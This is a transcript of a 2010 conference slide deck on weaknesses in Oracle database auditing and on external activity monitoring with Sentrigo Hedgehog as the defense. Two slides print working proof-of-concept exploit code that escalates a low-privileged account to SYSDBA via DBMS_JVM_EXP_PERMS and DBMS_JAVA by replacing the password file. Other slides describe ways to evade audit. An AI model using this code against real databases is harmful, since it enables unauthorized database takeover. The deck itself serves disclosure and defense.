Transcript Catching the horse after it has bolted through the

Securely Recording
The Use of Privilege
In Oracle Databases
Paul M. Wright June 2010 for Sentrigo
1
Overview of presentation
• State of database auditing today.
• Problems with Oracle audit >> demo!
• Solution >> Database Application Activity
Monitoring Systems (DAMS).
• SAS70 project I completed in the financial
services using Hedgehog DAMS.
• Advanced DAMS usage:
– Fix Java zero days in Oracle
– Verifying DBA change tickets using DAMS
– Record and protect use of DBA privilege
• Future of DAMS.
State of Database auditing today
Database auditing is before the wheel.
..If we consider the security monitoring of a bank vault…
3
DB is the modern Bank Vault
• Do bank managers say things like - “I am sorry, but we can not monitor the
vault today because it may become too slow to use?
• Of course not but..
– DBs are NOT monitored due to performance concerns.
• Does the Bank Manager get to switch off the cameras in the vault when they
want?
– DBA privilege is enough to turn off Database auditing.
• An organisation's data can be as valuable as money kept in a vault.
• But the ability to securely record access has not been widely available.
4
Known problems with Oracle Audit
• SYSDBA privilege can modify audit in SYS.AUD$
• OSDBA privilege can modify .aud files in
$ORACLE_HOME/rdbms/audit
• Low priv accounts can escalate to SYSDBA.
• There are new ways for low privileged accounts to
evade audit, with Oracle currently.
• Revoking execute on DBMS_SYS_SQL helps reduce
some of the risk.
• But surely Syslog audit in 10.2 and 11g is now
secure?
5
How secure is Syslog audit?
• In >= 10.2 AUDIT_SYSLOG_LEVEL sends audit to Syslog remotely or
locally to /var/log/secure which is only accessible to root.
[oracle@linuxbox ~]$ cat /var/log/secure
cat: /var/log/secure: Permission denied
[oracle@linuxbox ~]$ su - root
Password:
[root@linuxbox ~]# cat /var/log/secureMay 17
16:51:39 linuxbox su: pam_unix(su-l:session):
• When AUDIT_SYSLOG_LEVEL is set and AUDIT_SYS_OPERATIONS set
to TRUE then all SYS* operations are recorded to /var/log/messages
even if AUDIT_TRAIL is set to NONE!
• Or if AUDIT_TRAIL is set to DB then SYS* actions still go to Syslog and
non-SYS* actions go to SYS.AUD$.
• This has been incorrectly recommended as secure by a number of authors.
• Ok.. Syslog is an improvement on traditional Oracle OS audit via *.aud
files which are accessible from the oracle unix account..
• If DBA accounts do not have root access then AUDIT_SYSLOG_LEVEL
parameter can provide some separation of duty between UNIX sysadmin
root and Oracle DBA/OSDBA accounts.
6
Effective Audit has to be external
• Banking separates root access from DBA account.
• So value in using AUDIT_SYSLOG_LEVEL ?
• But code ran as SYS can still turn off the audit
trail as audit is controlled from the DB!
• The act of turning off Oracle audit can be hidden.
• The only evidence of escalation to SYS would be a
mandatory audit entry showing the SYS connection
and DB restart. i.e. routine entries >> ignored..
• Low priv user can bypass audit using DBMS_SYS_SQL
• Effective audit has to be external >> DEMO
7
External audit solution is DAMS
•
•
•
•
•
•
DAMS =External audit outside of DBA privs.
Either Host based on OS of DB, App/WWW.
Or Network based appliance on a tap.
Both Alert to SQL queries and session info.
Enables us to see into the black box of the DB.
How do these two methods compare?
8
Host vs network based DAMS
•
Host based has the following advantages:
–
–
–
–
–
–
–
•
Read encrypted/obfuscated exploits.
Recognise schemas when not specified.
See through a synonym using object keyword.
Trace dependencies between packages.
Read SSH’d connections.
Monitor local bequeath connections from OS.
Cannot be turned off by OSDBA/SYSDBA privs
Common objections to host-based agents from DBAs are that agents
can be:
– Unreliable.
– Resource intensive.
– Add complexity to an already complex system.
Also Monitors DBAs which they might not like.
•
In my experience on recent 1.5 year SAS70 project Sentrigo
Hedgehog is reliable and performant.
9
SAS70 Project Overview
•
•
Financial services SAS70 project.
Gained compliance with Sentrigo Hedgehog
•
•
•
•
•
•
IDS and IPS with prewritten rules
User activity monitoring and alerting.
Low CPU ~ less than 1%
High reliability. Did not affect workings of the
DB itself.
Project published by UKOUG.
Champagne all round.
10
DAMS Server Implementation
11
Production CPU% of HH sensor
orc001a_cpu%
1.2
%CPU Sensor using TOP
1
0.8
0.6
0.4
0.2
0
00:00
04:48
09:36
14:24
19:12
00:00
04:48
time over 24 hours
12
Published by UKOUG Nov 2009
SAS70 Sentrigo Hedgehog DAMS
project was published in UKOUG
SCENE Journal (Nov 2009) and
highlighted positively within the
Editorial below.
13
Advanced DAMS usage
Installation, setup and testing was reasonably
straightforward.
Then extended with Advanced DAMS usage…
1. Fixed Java priv zero days before patch by scoping
effect of change beforehand by using DAMS.
2. Verified DBA change tickets afterwards using DAMS.
Benefits:
•
•
•
Faster QA process = Competitive advantage
Lower risk Prod changes = more resilient systems
Protection of the DBA privilege = more security
How to fix Java zero days?
• I received advanced notification of Hacking Aurora
in 11g by David Litchfield.
• Zero days. No patch.
• Exploit code could be released any day.
• Analysed the exploit code and defined a fix.
• Revoke public execute from a number of PL/SQL
packages and Java classes.
• But what about the effects of that fix on the rest of
the applications?
• This is really a change management problem.
15
Change management methodology
• How does change management usually work?
• Rely on devs to understand effects of change.
• Problems are
– complexity
– lack of communication and clear documentation
– political fiefdoms in an organisation protect their part of the app.
•
•
•
•
Common solution is to use time delay before changes.
If a change does not break QA for a month put in Production.
But this is slow and could miss bugs.
What about using Hedgehog to enable safe fix testing?
• If we can see how an DB/application mechanism works
using a DAMS we can predict the effect of a fix
16
PL/SQL Java privilege escalation
•
•
•
PoC code is adapted so that it works on 10g.
I was first to publish that it also affected 10.2.0.4.3
It grants privileges to execute any file on the OS which is owned by Oracle.
SQL> DECLARE
2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
3 CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL
FILES>>','execute','ENABLED' FROM DUAL;
4 BEGIN
5 OPEN C1;
6 FETCH C1 BULK COLLECT INTO POL;
7 CLOSE C1;
8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
9 END;
10 /
DECLARE
*
ERROR at line 1:
ORA-29532: Java call terminated by uncaught Java exception:
java.lang.SecurityException: policy table update java.lang.RuntimePermission,
loadLibrary.*
ORA-06512: at "SYS.DBMS_JVM_EXP_PERMS", line 189
ORA-06512: at line 8
17
How to use Java priv to gain SYSDBA
PoC code which uses that execute privilege to gain
SYSDBA on 11g
--Backup the password file:
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper
mv /u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11G
/u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11Gbu')from
dual;
--Recreate the password file with known password:
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','ma
in',
'/u01/app/oracle/product/11.2.0/db_1/bin/orapwd',
'file=/u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11G',
'password=attackersyspassword') from dual;
sqlplus /nolog
conn sys/[email protected]/DB11G as sysdba
18
Revoke PUBLIC execute
For < 10.2.0.4.4 this is the main revoke:
revoke execute on sys.dbms_jvm_exp_perms
from PUBLIC;
• But what is the effect of this revoke on the
rest of the DB and applications that access it?
• How do I scope before making the change?
• Used normal static analysis of source code and
consult with devs and DBAs.
• DAMS rules to record access to vulnerable
packages.
19
4. Hedgehog Rules monitor vulns
Before revoke done check DBMS_JVM_EXP_PERMS not used with HH
--Records successful executions of SYS.DBMS_JVM_EXP_PERMS
Object=‘SYS.DBMS_JVM_EXP_PERMS’;
--Records strings containing ‘DBMS_JVM_EXP_PERMS’ ( includes failed attempts).
Statement contains ‘DBMS_JVM_EXP_PERMS’;
--Test the queries with a stimulus to make sure they work.
Select ‘DBMS_JVM_EXP_PERMS’from dual;
1. Wait for alerts to be generated.
2. No alerts recorded even when using datapump.
3. So can do the revokes with low risk.
Can do the same for other packages such as SYS.DBMS_SYS_SQL
20
Securing Java In Oracle
• Could use this method for all Java classes in DB to
scope removing the JVM completely.
• DBMS_JAVA and DBMS_JAVA_TEST do not have the
public execute revoked in latest CPU for 11g.
• The vulnerability is dealt with only by revoking public
execute from oracle/aurora/util/Wrapper
• So attacker could use a different vector for
DBMS_JAVA.
• For example attacker could write their own Wrapper
class if they had CREATE PROCEDURE privilege.
21
Verifying Change Tickets
Main aim is to monitor the DBA privilege not the DBA
person
• The vast majority of DBAs are honest and very hard working.
• But low priv accounts can be escalated to DBA
• With HH we are protecting the DBA’s privilege by
– Accurately recording DBA privilege usage
– Cross reference DAMS alert to JIRA change ticket number in
the change SQL.
– Escalate alert if there is no change ticket for the DDL event
recorded in HH.
• Can only do this when DAMS has a forensic level of accuracy.
22
i.e. No false positives!
Results of Project for the Business
1. DAMS installation gained SAS70 compliancy.
2. Protection of knowing not exploited.
3. QA to production process had lower risk.
4. Halve the time fixes spent in QA.
5. Fixed zero days before Oracle patched.
6. Verification of change tickets.
7. SYS privilege usage protected and recorded.
23
Where is this leading?
1.
2.
3.
4.
First we had IDS/IPS… SANS.
Then User/App activity Monitoring and DAMS
Now DAMS change management integration
Next stage is automated proactive state
checking of code, configuration and user
privileges on remote hosts from central state
repository.
–
–
–
Repscan/PFCLScan can be used for these purposes.
Alert to regression of previous vulnerabilities.
Verification that policy is being kept to.
24
Summary
• In addition to IPS and account activity monitoring.
– DAMS can be used to shorten the SDLC.
– Reduce risk of development changes.
– Bringing transparency to the workings of the database
application mechanism.
• Host based DAMS provide the best method of
securely recording the use of privilege in the
Oracle database.
• Questions?
25